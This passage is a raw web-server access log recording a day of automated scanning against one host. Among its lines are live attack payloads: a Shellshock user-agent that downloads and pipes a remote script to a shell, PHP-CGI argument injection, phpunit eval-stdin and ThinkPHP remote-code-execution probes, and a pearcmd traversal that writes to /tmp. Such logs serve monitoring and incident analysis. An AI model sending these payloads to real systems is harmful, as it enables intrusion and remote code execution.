92.249.249.197 "/form.html" [Client 134.199.146.250] [Length 122] [Gzip 1.35] "curl/8.1.2" "-" +[15/Jan/2026:14:17:53 +0000] 404 - GET http 92.249.249.197 "/upl.php" [Client 134.199.146.250] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:14:17:54 +0000] 404 - GET http 92.249.249.197 "/t4" [Client 134.199.146.250] [Length 122] [Gzip 1.35] "Mozilla/5.0" "-" +[15/Jan/2026:14:17:54 +0000] 404 - GET http 92.249.249.197 "/geoip/" [Client 134.199.146.250] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[15/Jan/2026:14:17:55 +0000] 400 - GET http 92.249.249.197 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[15/Jan/2026:14:17:56 +0000] 404 - GET http 92.249.249.197 "/1.php" [Client 134.199.146.250] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[15/Jan/2026:14:17:56 +0000] 404 - GET http 92.249.249.197 "/systembc/password.php" [Client 134.199.146.250] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[15/Jan/2026:14:17:57 +0000] 404 - GET http 92.249.249.197 "/password.php" [Client 134.199.146.250] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36" "-" +[15/Jan/2026:14:19:55 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:14:21:38 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:14:23:02 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/" [Client 194.187.176.122] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" +[15/Jan/2026:14:23:02 +0000] 400 - GET http 92-249-249-197.pool.digikabel.hu "/favicon.ico" [Client 194.187.176.100] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" +[15/Jan/2026:14:24:05 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[15/Jan/2026:14:33:08 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:14:48:14 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:14:54:29 +0000] 404 - GET http 92.249.249.197 "/SDK/webLanguage" [Client 93.123.72.132] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:14:55:30 +0000] 200 - GET http 92.249.249.197 "/" [Client 176.65.148.247] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:15:01:43 +0000] 404 - GET http 92.249.249.197 "/login" [Client 193.142.146.230] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:15:07:49 +0000] 200 - GET http 92.249.249.197 "/" [Client 87.121.84.15] [Length 1033] [Gzip -] "Mozilla/1.0" "-" +[15/Jan/2026:15:13:35 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:15:14:03 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:15:16:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:15:26:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 84.17.55.211] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:15:35:16 +0000] 404 - POST http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[15/Jan/2026:15:35:16 +0000] 200 - GET http 92.249.249.197 "/" [Client 192.159.99.95] [Length 0] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io" "-" +[15/Jan/2026:15:40:46 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:15:48:17 +0000] 404 - GET http 127.0.0.1 "/logon.htm" [Client 93.123.72.132] [Length 150] [Gzip -] "Hello World" "-" +[15/Jan/2026:16:04:43 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:16:09:56 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:16:25:25 +0000] 200 - GET http 92.249.249.197 "/" [Client 103.252.89.75] [Length 1033] [Gzip -] "-" "-" +[15/Jan/2026:16:28:22 +0000] 200 - GET http 92.249.249.197 "/?XDEBUG_SESSION_START=phpstorm" [Client 79.124.40.174] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[15/Jan/2026:16:30:17 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:16:44:10 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:16:55:52 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:17:02:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:17:08:29 +0000] 404 - POST http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 192.159.99.95] [Length 150] [Gzip -] "Mozilla/5.0 (rondo2012@atomicmail.io)" "-" +[15/Jan/2026:17:08:29 +0000] 200 - GET http 92.249.249.197 "/" [Client 192.159.99.95] [Length 1033] [Gzip -] "() { :; }; /bin/bash -c \x22(wget -qO- http://41.231.37.153/rondo.qre.sh||busybox wget -qO- http://41.231.37.153/rondo.qre.sh||curl -s http://41.231.37.153/rondo.qre.sh)|sh\x22& # rondo2012@atomicmail.io" "-" +[15/Jan/2026:17:20:09 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:17:22:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/style.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/style.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/themes/style.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:11 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/style.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/style.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/chosen.php?p=" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/file.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/flower.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/gifclass.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:12 +0000] 404 - GET http profibot.direct.quickconnect.to "/bless.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/class-t.api.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/blurbs.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/akcc.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/abcd.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/shelp.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:13 +0000] 404 - GET http profibot.direct.quickconnect.to "/cord.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/dex.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/admin-ajax.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/file2.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:14 +0000] 404 - GET http profibot.direct.quickconnect.to "//zwso.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/zwso.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:14 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_mna.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/bolt.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/shlo.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/133.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/ahax.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/php8.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:15 +0000] 404 - GET http profibot.direct.quickconnect.to "/lufix1.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/witmm.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/css/index.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/index.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/index.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/ioxi-o.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:16 +0000] 404 - GET http profibot.direct.quickconnect.to "/222.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/files.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-editor.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/txets.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/txets.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/txets.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:17 +0000] 404 - GET http profibot.direct.quickconnect.to "/postnews.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:18 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/postnews.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:22:18 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/postnews.php" [Client 104.28.235.59] [Length 122] [Gzip 1.35] "Go-http-client/1.1" "-" +[15/Jan/2026:17:43:58 +0000] 404 - GET http 92.249.249.197 "/actuator/gateway/routes" [Client 79.124.40.174] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" +[15/Jan/2026:17:45:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:17:55:08 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:17:57:14 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 115.190.29.141] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:17:57:18 +0000] 400 - POST http localhost-nginx-proxy-manager "-" [Client 115.190.29.141] [Length 154] [Gzip -] "-" "-" +[15/Jan/2026:17:57:19 +0000] 404 - POST http 92.249.249.197 "/hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:19 +0000] 405 - POST http 92.249.249.197 "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" [Client 115.190.29.141] [Length 154] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:19 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:20 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:21 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:22 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:23 +0000] 404 - GET http 92.249.249.197 "/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:23 +0000] 404 - GET http 92.249.249.197 "/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:24 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:25 +0000] 404 - GET http 92.249.249.197 "/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:25 +0000] 404 - GET http 92.249.249.197 "/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:26 +0000] 404 - GET http 92.249.249.197 "/phpunit/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:26 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:26 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:27 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:27 +0000] 404 - GET http 92.249.249.197 "/lib/phpunit/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:28 +0000] 404 - GET http 92.249.249.197 "/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:28 +0000] 404 - GET http 92.249.249.197 "/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:29 +0000] 404 - GET http 92.249.249.197 "/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:30 +0000] 404 - GET http 92.249.249.197 "/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:30 +0000] 404 - GET http 92.249.249.197 "/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:30 +0000] 404 - GET http 92.249.249.197 "/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:30 +0000] 404 - GET http 92.249.249.197 "/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:31 +0000] 404 - GET http 92.249.249.197 "/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:31 +0000] 404 - GET http 92.249.249.197 "/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:32 +0000] 404 - GET http 92.249.249.197 "/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:32 +0000] 404 - GET http 92.249.249.197 "/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:32 +0000] 404 - GET http 92.249.249.197 "/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:33 +0000] 404 - GET http 92.249.249.197 "/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:33 +0000] 404 - GET http 92.249.249.197 "/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:33 +0000] 404 - GET http 92.249.249.197 "/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:34 +0000] 404 - GET http 92.249.249.197 "/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:34 +0000] 404 - GET http 92.249.249.197 "/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:34 +0000] 404 - GET http 92.249.249.197 "/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:34 +0000] 404 - GET http 92.249.249.197 "/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:35 +0000] 404 - GET http 92.249.249.197 "/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:35 +0000] 404 - GET http 92.249.249.197 "/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:36 +0000] 404 - GET http 92.249.249.197 "/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:36 +0000] 404 - GET http 92.249.249.197 "/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:36 +0000] 404 - GET http 92.249.249.197 "/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:37 +0000] 404 - GET http 92.249.249.197 "/public/index.php?s=/index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:37 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/&/+/tmp/index1.php" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:37 +0000] 403 - GET http 92.249.249.197 "/index.php?lang=../../../../../../../../tmp/index1" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:17:57:37 +0000] 404 - GET http 92.249.249.197 "/containers/json" [Client 115.190.29.141] [Length 150] [Gzip -] "libredtail-http" "-" +[15/Jan/2026:18:04:00 +0000] 405 - POST http 92.249.249.197 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[15/Jan/2026:18:10:38 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:18:14:11 +0000] 200 - GET http 92.249.249.197 "/" [Client 149.50.103.48] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[15/Jan/2026:18:35:42 +0000] 200 - GET http 92.249.249.197 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 